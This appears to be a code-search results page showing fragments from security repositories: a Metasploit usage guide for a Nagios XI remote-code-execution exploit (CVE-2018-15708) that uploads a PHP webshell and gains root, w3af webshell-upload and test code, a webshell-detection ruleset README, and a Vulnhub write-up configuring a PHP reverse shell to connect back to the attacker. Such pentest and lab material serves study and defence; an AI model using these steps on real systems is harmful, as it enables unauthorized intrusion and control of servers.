154        self.exploit_url = exploit_url
                    
155    
                    
                
nagios_xi_magpie_debug.md https://github.com/rapid7/metasploit-framework.git | Markdown | 100 lines
                    
2
                    
3This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
                    
4CVE-2018-15708 which allows for unauthenticated remote code execution
                    
8
                    
9The exploit works as follows:
                    
10
                    
14  - The `RSRVHOST` and `RSRVPORT` options are used to specify the HTTPS server host and port.
                    
15- A PHP webshell and payload executable are uploaded via `magpie_debug.php`.
                    
16- A command is executed via the webshell. This command elevates privileges and runs the payload executable.
                    
321. `msfconsole`
                    
331. `use exploit/linux/http/nagios_xi_magpie_debug`
                    
341. `set RHOSTS [IP]`
                    
351. `set RSRVHOST [IP]`
                    
361. `exploit`
                    
371. You should get a new session with *root* privileges
                    
                
file_upload.py https://github.com/andresriancho/w3af.git | Python | 224 lines
                    
55
                    
56        Then the exploit plugin that exploits os_commanding
                    
57        ( attack.os_commanding ) should return 'os_commanding' in this method.
                    
68
                    
69        if exploit_url is not None:
                    
70
                    
127        if shell_handler.SHELL_IDENTIFIER in response.get_body():
                    
128            return exploit_url
                    
129
                    
136        for shell_str, orig_extension in shell_handler.get_webshells(extension):
                    
137            # If the webshell was webshell.php this will return a file_name
                    
138            # containing kgiwjxh.php (8 rand and the extension)
                    
177        
                    
178        self._exploit_url = exploit_url
                    
179            
                    
223        """
                    
224        return self.__class__, (self._vuln, None, None, self._exploit_url)
                    
                
README.md https://bitbucket.org/lazy_dogtown/doxi-rules.git | Markdown | 99 lines
                    
64hint for hacked / misused / C&C-servers and tries to detect
                    
65web-backdoors, webshells and other malicious access to unwanted
                    
66files/services.
                    
83
                    
84- detect exploit/misuse-attempts againts web-applications; please see 
                    
85scanner.rules for some details on webapp-based scanners
                    
89- generic rules to protect a webserver from misconfiguration 
                    
90and known mistakes / exploit-vectors 
                    
91
                    
                
test_shell_handler.py https://github.com/andresriancho/w3af.git | Python | 119 lines
                    
24
                    
25from w3af.plugins.attack.payloads.shell_handler import (get_webshells,
                    
26                                                        get_shell_code)
                    
69    def test_get_web_shell_extension(self):
                    
70        shells = get_webshells('php')
                    
71        
                    
80    def test_get_web_shell_code_extension_force(self):
                    
81        shells = get_webshells('php', True)
                    
82
                    
90    def test_get_web_shell_code_no_extension(self):
                    
91        shells = get_webshells('')
                    
92        
                    
96    def test_get_web_shell_code_invalid_extension(self):
                    
97        shells = get_webshells('123456')
                    
98        
                    
                
2020-09-19-sedna-vulnhub.md https://github.com/wulfgarpro/wulfgarpro.github.io.git | Markdown | 193 lines
                    
52
                    
53Download the non-Metasploit PoC with EDB-ID [40390](https://www.exploit-db.com/exploits/40390):
                    
54
                    
87
                    
88Copy _/usr/share/webshells/php/php-reverse-shell.php_ from Kali's bundled webshells and update the connect back IP address/port to be the attacking IP address/port:
                    
89
                    
89
                    
90![php-webshell](/images/posts/penlog_sedna_by_vulnhub/php_webshell.png)
                    
91
                    
                
 

Source

Language